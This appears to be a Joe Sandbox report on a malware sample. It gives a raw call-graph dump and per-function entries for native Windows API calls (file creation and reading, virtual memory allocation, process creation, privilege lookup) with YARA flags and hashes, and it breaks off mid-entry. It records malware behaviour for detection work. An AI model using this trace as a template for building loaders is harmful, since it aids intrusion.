NtReadFile 103676->103677 103677->103648 103679 25bbb9d 103678->103679 103680 25bbbb4 103678->103680 103679->103680 103681 25bbf90 2 API calls 103679->103681 103680->103658 103682 25bbbcb 103681->103682 103682->103658 103683->103649 103684->103635 103686 25baf60 LdrLoadDll 103685->103686 103687 25ba64c RtlAllocateHeap 103686->103687 103687->103674 103818 25ba540 103688->103818 103690 25bbd6d 103690->103579 103692 25b4081 103691->103692 103693 25b4089 103691->103693 103692->103582 103722 25b435c 103693->103722 103821 25bcf30 103693->103821 103695 25b40dd 103696 25bcf30 2 API calls 103695->103696 103701 25b40e8 103696->103701 103697 25b4136 103699 25bcf30 2 API calls 103697->103699 103704 25b414a 103699->103704 103701->103697 103829 25bcfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 103701->103829 103830 25bd060 103701->103830 103702 25b41a7 103703 25bcf30 2 API calls 103702->103703 103705 25b41bd 103703->103705 103704->103702 103706 25bd060 3 API calls 103704->103706 103707 25b41fa 103705->103707 103709 25bd060 3 API calls 103705->103709 103706->103704 103708 25bcf30 2 API calls 103707->103708 103710 25b4205 103708->103710 103709->103705 103711 25bd060 3 API calls 103710->103711 103718 25b423f 103710->103718 103711->103710 103714 25bcf90 2 API calls 103715 25b433e 103714->103715 103716 25bcf90 2 API calls 103715->103716 103717 25b4348 103716->103717 103719 25bcf90 2 API calls 103717->103719 103826 25bcf90 103718->103826 103720 25b4352 103719->103720 103721 25bcf90 2 API calls 103720->103721 103721->103722 103722->103582 103724 25b53a1 103723->103724 103725 25b4a50 8 API calls 103724->103725 103726 25b53b7 103725->103726 103727 25b53f2 103726->103727 103728 25b5405 103726->103728 103732 25b540a 103726->103732 103729 25bbdc0 2 API calls 103727->103729 103730 25bbdc0 2 API calls 103728->103730 103731 25b53f7 103729->103731 103730->103732 103731->103585 103732->103585 103836 25bac30 103733->103836 103736 25bac30 LdrLoadDll 103737 25bad8d 103736->103737 103738 25bac30 LdrLoadDll 103737->103738 103739 25bad96 103738->103739 103740 25bac30 LdrLoadDll 103739->103740 103741 25bad9f 103740->103741 103742 25bac30 LdrLoadDll 103741->103742 103743 25bada8 103742->103743 103744 25bac30 LdrLoadDll 103743->103744 103745 25badb1 103744->103745 103746 25bac30 LdrLoadDll 103745->103746 103747 25badbd 103746->103747 103748 25bac30 LdrLoadDll 103747->103748 103749 25badc6 103748->103749 103750 25bac30 LdrLoadDll 103749->103750 103751 25badcf 103750->103751 103752 25bac30 LdrLoadDll 103751->103752 103753 25badd8 103752->103753 103754 25bac30 LdrLoadDll 103753->103754 103755 25bade1 103754->103755 103756 25bac30 LdrLoadDll 103755->103756 103757 25badea 103756->103757 103758 25bac30 LdrLoadDll 103757->103758 103759 25badf6 103758->103759 103760 25bac30 LdrLoadDll 103759->103760 103761 25badff 103760->103761 103762 25bac30 LdrLoadDll 103761->103762 103763 25bae08 103762->103763 103764 25bac30 LdrLoadDll 103763->103764 103765 25bae11 103764->103765 103766 25bac30 LdrLoadDll 103765->103766 103767 25bae1a 103766->103767 103768 25bac30 LdrLoadDll 103767->103768 103769 25bae23 103768->103769 103770 25bac30 LdrLoadDll 103769->103770 103771 25bae2f 103770->103771 103772 25bac30 LdrLoadDll 103771->103772 103773 25bae38 103772->103773 103774 25bac30 LdrLoadDll 103773->103774 103775 25bae41 103774->103775 103776 25bac30 LdrLoadDll 103775->103776 103777 25bae4a 103776->103777 103778 25bac30 LdrLoadDll 103777->103778 103779 25bae53 103778->103779 103780 25bac30 LdrLoadDll 103779->103780 103781 25bae5c 103780->103781 103782 25bac30 LdrLoadDll 103781->103782 103783 25bae68 103782->103783 103784 25bac30 LdrLoadDll 103783->103784 103785 25bae71 103784->103785 103786 25bac30 LdrLoadDll 103785->103786 103787 25bae7a 103786->103787 103788 25bac30 LdrLoadDll 103787->103788 103789 25bae83 103788->103789 103790 25bac30 LdrLoadDll 103789->103790 103791 25bae8c 103790->103791 103792 25bac30 LdrLoadDll 103791->103792 103793 25bae95 103792->103793 103794 25bac30 LdrLoadDll 103793->103794 103795 25baea1 103794->103795 103796 25bac30 LdrLoadDll 103795->103796 103797 25baeaa 103796->103797 103798 25bac30 LdrLoadDll 103797->103798 103799 25baeb3 103798->103799 103800 25bac30 LdrLoadDll 103799->103800 103801 25baebc 103800->103801 103802 25bac30 LdrLoadDll 103801->103802 103803 25baec5 103802->103803 103804 25bac30 LdrLoadDll 103803->103804 103805 25baece 103804->103805 103806 25bac30 LdrLoadDll 103805->103806 103807 25baeda 103806->103807 103808 25bac30 LdrLoadDll 103807->103808 103809 25baee3 103808->103809 103810 25bac30 LdrLoadDll 103809->103810 103811 25baeec 103810->103811 103811->103590 103813 25baf60 LdrLoadDll 103812->103813 103814 25b9edc 103813->103814 103842 4822df0 LdrInitializeThunk 103814->103842 103815 25b9ef3 103815->103511 103817->103587 103819 25baf60 LdrLoadDll 103818->103819 103820 25ba55c NtAllocateVirtualMemory 103819->103820 103820->103690 103822 25bcf40 103821->103822 103823 25bcf46 103821->103823 103822->103695 103824 25bbf90 2 API calls 103823->103824 103825 25bcf6c 103824->103825 103825->103695 103827 25bbdc0 2 API calls 103826->103827 103828 25b4334 103827->103828 103828->103714 103829->103701 103832 25bcfd0 103830->103832 103831 25bd02d 103831->103701 103832->103831 103833 25bbf90 2 API calls 103832->103833 103834 25bd00a 103833->103834 103835 25bbdc0 2 API calls 103834->103835 103835->103831 103837 25bac4b 103836->103837 103838 25b4e50 LdrLoadDll 103837->103838 103839 25bac6b 103838->103839 103840 25b4e50 LdrLoadDll 103839->103840 103841 25bad17 103839->103841 103840->103841 103841->103736 103842->103815 103844 4822c11 103843->103844 103845 4822c1f LdrInitializeThunk 103843->103845 103844->103596 103845->103596 103847 25baf60 LdrLoadDll 103846->103847 103848 25ba68c RtlFreeHeap 103847->103848 103848->103600 103850 25a7eab 103849->103850 103851 25a7eb0 103849->103851 103850->103519 103852 25bbd40 2 API calls 103851->103852 103859 25a7ed5 103852->103859 103853 25a7f38 103853->103519 103854 25b9ec0 2 API calls 103854->103859 103855 25a7f3e 103857 25a7f64 103855->103857 103858 25ba5c0 2 API calls 103855->103858 103857->103519 103860 25a7f55 103858->103860 103859->103853 103859->103854 103859->103855 103861 25bbd40 2 API calls 103859->103861 103865 25ba5c0 103859->103865 103860->103519 103861->103859 103863 25ba5c0 2 API calls 103862->103863 103864 25a817e 103863->103864 103864->103476 103866 25baf60 LdrLoadDll 103865->103866 103867 25ba5dc 103866->103867 103870 4822c70 LdrInitializeThunk 103867->103870 103868 25ba5f3 103868->103859 103870->103868 103872 25bb5c3 103871->103872 103875 25aacf0 103872->103875 103876 25aad14 103875->103876 103877 25aad50 LdrLoadDll 103876->103877 103878 25a9c4a 103876->103878 103877->103878 103878->103482 103880 25ab063 103879->103880 103882 25ab0e0 103880->103882 103894 25b9c90 LdrLoadDll 103880->103894 103882->103489 103884 25baf60 LdrLoadDll 103883->103884 103885 25af1bb 103884->103885 103885->103492 103886 25ba7d0 103885->103886 103887 25baf60 LdrLoadDll 103886->103887 103888 25ba7ef LookupPrivilegeValueW 103887->103888 103888->103494 103890 25baf60 LdrLoadDll 103889->103890 103891 25ba27c 103890->103891 103895 4822ea0 LdrInitializeThunk 103891->103895 103892 25ba29b 103892->103495 103894->103882 103895->103892 103897 25ab1f0 103896->103897 103898 25ab040 LdrLoadDll 103897->103898 103899 25ab204 103898->103899 103899->103429 103901 25aaf34 103900->103901 103973 25b9c90 LdrLoadDll 103901->103973 103903 25aaf6e 103903->103431 103905 25af3ac 103904->103905 103906 25ab1c0 LdrLoadDll 103905->103906 103907 25af3be 103906->103907 103974 25af290 103907->103974 103910 25af3d9 103912 25ba490 2 API calls 103910->103912 103913 25af3e4 103910->103913 103911 25af3f1 103914 25ba490 2 API calls 103911->103914 103915 25af402 103911->103915 103912->103913 103913->103435 103914->103915 103915->103435 103917 25af43c 103916->103917 103993 25ab2b0 103917->103993 103919 25af44e 103920 25af290 3 API calls 103919->103920 103921 25af45f 103920->103921 103922 25af469 103921->103922 103923 25af481 103921->103923 103924 25af474 103922->103924 103926 25ba490 2 API calls 103922->103926 103925 25af492 103923->103925 103927 25ba490 2 API calls 103923->103927 103924->103437 103925->103437 103926->103924 103927->103925 103929 25acaa6 103928->103929 103930 25acab0 103928->103930 103929->103446 103931 25aaf10 LdrLoadDll 103930->103931 103932 25acb4e 103931->103932 103933 25acb74 103932->103933 103934 25ab040 LdrLoadDll 103932->103934 103933->103446 103935 25acb90 103934->103935 103936 25b4a50 8 API calls 103935->103936 103937 25acbe5 103936->103937 103937->103446 103939 25ad646 103938->103939 103940 25ab040 LdrLoadDll 103939->103940 103941 25ad65a 103940->103941 103997 25ad310 103941->103997 103943 25a908b 103944 25acc00 103943->103944 103946 25acc26 103944->103946 103945 25acca9 103948 25ab040 LdrLoadDll 103945->103948 103946->103945 103947 25ab040 LdrLoadDll 103946->103947 103947->103945 103949 25acd16 103948->103949 103950 25aaf10 LdrLoadDll 103949->103950 103951 25acd7f 103950->103951 103952 25ab040 LdrLoadDll 103951->103952 103953 25ace2f 103952->103953 103953->103459 103957 25a8d14 103954->103957 104026 25af6d0 103954->104026 103956 25a8f25 103956->103414 103957->103956 104031 25b43a0 103957->104031 103959 25a8d70 103959->103956 104034 25a8ab0 103959->104034 103962 25bcf30 2 API calls 103963 25a8db2 103962->103963 103964 25bd060 3 API calls 103963->103964 103966 25a8dc7 103964->103966 103965 25a7ea0 4 API calls 103965->103966 103966->103956 103966->103965 103969 25ac7b0 18 API calls 103966->103969 103970 25a8160 2 API calls 103966->103970 104039 25af670 103966->104039 104043 25af080 21 API calls 103966->104043 103969->103966 103970->103966 103971->103439 103972->103457 103973->103903 103975 25af2aa 103974->103975 103983 25af360 103974->103983 103976 25ab040 LdrLoadDll 103975->103976 103977 25af2cc 103976->103977 103984 25b9f40 103977->103984 103979 25af30e 103987 25b9f80 103979->103987 103982 25ba490 2 API calls 103982->103983 103983->103910 103983->103911 103985 25baf60 LdrLoadDll 103984->103985 103986 25b9f5c 103985->103986 103986->103979 103988 25b9f9c 103987->103988 103989 25baf60 LdrLoadDll 103987->103989 103992 48235c0 LdrInitializeThunk 103988->103992 103989->103988 103990 25af354 103990->103982 103992->103990 103994 25ab2d7 103993->103994 103995 25ab040 LdrLoadDll 103994->103995 103996 25ab313 103995->103996 103996->103919 103998 25ad327 103997->103998 104006 25af710 103998->104006 104002 25ad39b 104003 25ad3a2 104002->104003 104017 25ba2a0 LdrLoadDll 104002->104017 104003->103943 104005 25ad3b5 104005->103943 104007 25af735 104006->104007 104018 25a81a0 104007->104018 104009 25af759 104010 25ad36f 104009->104010 104011 25b4a50 8 API calls 104009->104011 104013 25bbdc0 2 API calls 104009->104013 104025 25af550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 104009->104025 104014 25ba6e0 104010->104014 104011->104009 104013->104009 104015 25baf60 LdrLoadDll 104014->104015 104016 25ba6ff CreateProcessInternalW 104015->104016 104016->104002 104017->104005 104019 25a829f 104018->104019 104020 25a81b5 104018->104020 104019->104009 104020->104019 104021 25b4a50 8 API calls 104020->104021 104022 25a8222 104021->104022 104023 25bbdc0 2 API calls 104022->104023 104024 25a8249 104022->104024 104023->104024 104024->104009 104025->104009 104027 25b4e50 LdrLoadDll 104026->104027 104028 25af6ef 104027->104028 104029 25af6fd 104028->104029 104030 25af6f6 SetErrorMode 104028->104030 104029->103957 104030->104029 104033 25b43c6 104031->104033 104044 25af4a0 104031->104044 104033->103959 104035 25bbd40 2 API calls 104034->104035 104038 25a8ad5 104035->104038 104036 25a8cea 104036->103962 104038->104036 104063 25b9880 104038->104063 104040 25af683 104039->104040 104111 25b9e90 104040->104111 104043->103966 104045 25af4bd 104044->104045 104051 25b9fc0 104045->104051 104048 25af505 104048->104033 104052 25baf60 LdrLoadDll 104051->104052 104053 25b9fdc 104052->104053 104061 4822f30 LdrInitializeThunk 104053->104061 104054 25af4fe 104054->104048 104056 25ba010 104054->104056 104057 25baf60 LdrLoadDll 104056->104057 104058 25ba02c 104057->104058 104062 4822d10 LdrInitializeThunk 104058->104062 104059 25af52e 104059->104033 104061->104054 104062->104059 104064 25bbf90 2 API calls 104063->104064 104065 25b9897 104064->104065 104084 25a9310 104065->104084 104067 25b98b2 104068 25b98d9 104067->104068 104069 25b98f0 104067->104069 104070 25bbdc0 2 API calls 104068->104070 104072 25bbd40 2 API calls 104069->104072 104071 25b98e6 104070->104071 104071->104036 104073 25b992a 104072->104073 104074 25bbd40 2 API calls 104073->104074 104075 25b9943 104074->104075 104080 25b9be4 104075->104080 104090 25bbd80 LdrLoadDll 104075->104090 104077 25b9bc9 104078 25b9bd0 104077->104078 104077->104080 104079 25bbdc0 2 API calls 104078->104079 104081 25b9bda 104079->104081 104082 25bbdc0 2 API calls 104080->104082 104081->104036 104083 25b9c39 104082->104083 104083->104036 104085 25a9335 104084->104085 104086 25aacf0 LdrLoadDll 104085->104086 104087 25a9368 104086->104087 104089 25a938d 104087->104089 104091 25acf20 104087->104091 104089->104067 104090->104077 104092 25acf2c 104091->104092 104093 25ba1e0 LdrLoadDll 104092->104093 104094 25acf65 104093->104094 104095 25acf6c 104094->104095 104102 25ba220 104094->104102 104095->104089 104099 25acfa7 104100 25ba490 2 API calls 104099->104100 104101 25acfca 104100->104101 104101->104089 104103 25ba23c 104102->104103 104104 25baf60 LdrLoadDll 104102->104104 104110 4822ca0 LdrInitializeThunk 104103->104110 104104->104103 104105 25acf8f 104105->104095 104107 25ba810 104105->104107 104108 25baf60 LdrLoadDll 104107->104108 104109 25ba82f 104108->104109 104109->104099 104110->104105 104112 25baf60 LdrLoadDll 104111->104112 104113 25b9eac 104112->104113 104116 4822dd0 LdrInitializeThunk 104113->104116 104114 25af6ae 104114->103966 104116->104114 104117 25b9080 104118 25b9089 104117->104118 104119 25bbd40 2 API calls 104118->104119 104121 25b90bb 104119->104121 104120 25b919c 104121->104120 104122 25aacf0 LdrLoadDll 104121->104122 104123 25b90f1 104122->104123 104124 25b4e50 LdrLoadDll 104123->104124 104126 25b910d 104124->104126 104125 25b9120 Sleep 104125->104126 104126->104120 104126->104125 104129 25b8ca0 LdrLoadDll 104126->104129 104130 25b8eb0 LdrLoadDll 104126->104130 104129->104126 104130->104126

                                                          Executed Functions

                                                          Function 025BA35A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 290 25ba35a-25ba3b1 call 25baf60 NtCreateFile
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,025B4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,025B4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 025BA3AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          • Opcode ID: 07184192ed192e94491db6e1c8ec3fbd5f0540bb83b1009677417d7a20cf99ee
                                                          • Instruction ID: 4de624d43a11bf5f28e303386761080e7a02fb4e95d547f2ff73526fdff6e1a4
                                                          • Opcode Fuzzy Hash: 07184192ed192e94491db6e1c8ec3fbd5f0540bb83b1009677417d7a20cf99ee
                                                          • Instruction Fuzzy Hash: 5D01AFB2605218AFCB18CF89DC84EEB77ADEF8C754F158248FA0D97240C630E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 025BA360 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 293 25ba360-25ba376 294 25ba37c-25ba3b1 NtCreateFile 293->294 295 25ba377 call 25baf60 293->295 295->294
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,025B4BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,025B4BB7,007A002E,00000000,00000060,00000000,00000000), ref: 025BA3AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction ID: 1b5dae25d6e98e2cf2c4f371e0fee8a0ce910f84f520e0ced4f039ad27adbaf0
                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction Fuzzy Hash: 4EF0BDB2200208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97240C630E811CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 025BA410 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtReadFile.NTDLL(025B4D72,5EB65239,FFFFFFFF,025B4A31,?,?,025B4D72,?,025B4A31,FFFFFFFF,5EB65239,025B4D72,?,00000000), ref: 025BA455
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction ID: 300a6c5a177208aa09c030227cdc2bbc88a8465f1a4c58ad7adcbf41f7e97f42
                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction Fuzzy Hash: EAF0A4B6200208ABCB14DF89DC84EEB77ADEF8C754F158248BA1D97241D630E811CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 025BA53B Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,025A2D11,00002000,00003000,00000004), ref: 025BA579
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: 7a33bcad0af6a4aa9c2216e2c0db5cd6d65ebfb4dae7d39e6af8404596113f39
                                                          • Instruction ID: 46490c936126875f2034225e748642ffa869468d64be6d19e36f6d50f4147138
                                                          • Opcode Fuzzy Hash: 7a33bcad0af6a4aa9c2216e2c0db5cd6d65ebfb4dae7d39e6af8404596113f39
                                                          • Instruction Fuzzy Hash: 34F01CB6200108AFDB14DF99CC80EEB77A9FF8C354F118249FE0997240C630E911CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 025BA540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,025A2D11,00002000,00003000,00000004), ref: 025BA579
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction ID: 4e1436b36e1dd6c372609400bd8f4d8abaf30495cf917dd248ca6f1e88368801
                                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction Fuzzy Hash: 05F015B6200208ABCB14DF89CC80EEB77ADEF88754F118148BE0897241C630F810CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 025BA490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtClose.NTDLL(025B4D50,?,?,025B4D50,00000000,FFFFFFFF), ref: 025BA4B5
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 025A0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_25a0000_control.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction ID: 8832688cac3e64e5660c28deeaafb87e840f22abec4da108647724aea95b85fc
                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction Fuzzy Hash: 67D012762002147BD710EB98CC45ED7775DEF84750F154455BA185B241C530F50086E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04822CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 0c3e64f16e7c52e29b6a0032885625ee24ee908b862b7d680f6815bc564517a1
                                                          • Instruction ID: 465a18438da738d122151f4fe77d92df5eafb9e44b8582e6a1a9468c9b9b2f69
                                                          • Opcode Fuzzy Hash: 0c3e64f16e7c52e29b6a0032885625ee24ee908b862b7d680f6815bc564517a1
                                                          • Instruction Fuzzy Hash: 9090023120140406F1007598540864600558BE0306F55D511B602D555EC665D9D57172
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04822C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 82c3408d54c53b4a90c5a9db797a41e5284a2af78920b75c5e73a140491ea126
                                                          • Instruction ID: 9e53806fe832a172ee82d99b1d5e78621e6279260e9c8d7aa90cf5df48aa9167
                                                          • Opcode Fuzzy Hash: 82c3408d54c53b4a90c5a9db797a41e5284a2af78920b75c5e73a140491ea126
                                                          • Instruction Fuzzy Hash: 6190023120140846F10071584404B4600558BE0306F55C516B112D654D8615D9957562
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04822C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d9b48898d49335d04fa067b3587ae5e5d99ceed37fa4b2b065fa0f5202c0de0b
                                                          • Instruction ID: eafe453e9b926adc1a8b14403f191035ebeadab3476460334f8f7d447177338e
                                                          • Opcode Fuzzy Hash: d9b48898d49335d04fa067b3587ae5e5d99ceed37fa4b2b065fa0f5202c0de0b
                                                          • Instruction Fuzzy Hash: 1190023120148806F1107158840474A00558BD0306F59C911B542D658D8695D9D57162
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04822DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d18c5cbc3fe7302e4012224f7df55f3378ebaca11c12c7e2555c211211f8edf8
                                                          • Instruction ID: a6ecda1e34537dd0f0b5893e49c820d3b44d7e531909e7c75977500a5c694a47
                                                          • Opcode Fuzzy Hash: d18c5cbc3fe7302e4012224f7df55f3378ebaca11c12c7e2555c211211f8edf8
                                                          • Instruction Fuzzy Hash: 0C900221242441567545B158440450740569BE0246795C512B241D950C8526E99AE662
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04822DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d1494953e77a0dc5c7b4f31e00ffb151df0f758af84088ceb71b5716f90b744b
                                                          • Instruction ID: 07b59e3d3b082b0fcc9d3dd0abe0ff6b24788060a4d6f63c4247f09b1a420c3b
                                                          • Opcode Fuzzy Hash: d1494953e77a0dc5c7b4f31e00ffb151df0f758af84088ceb71b5716f90b744b
                                                          • Instruction Fuzzy Hash: 5F90023120140417F1117158450470700598BD0246F95C912B142D558D9656DA96B162
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04822D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047B0000, based on PE: true
                                                          • Associated: 00000007.00000002.4443991237.00000000048D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.00000000048DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_47b0000_control.jbxd
                                                          Similarity
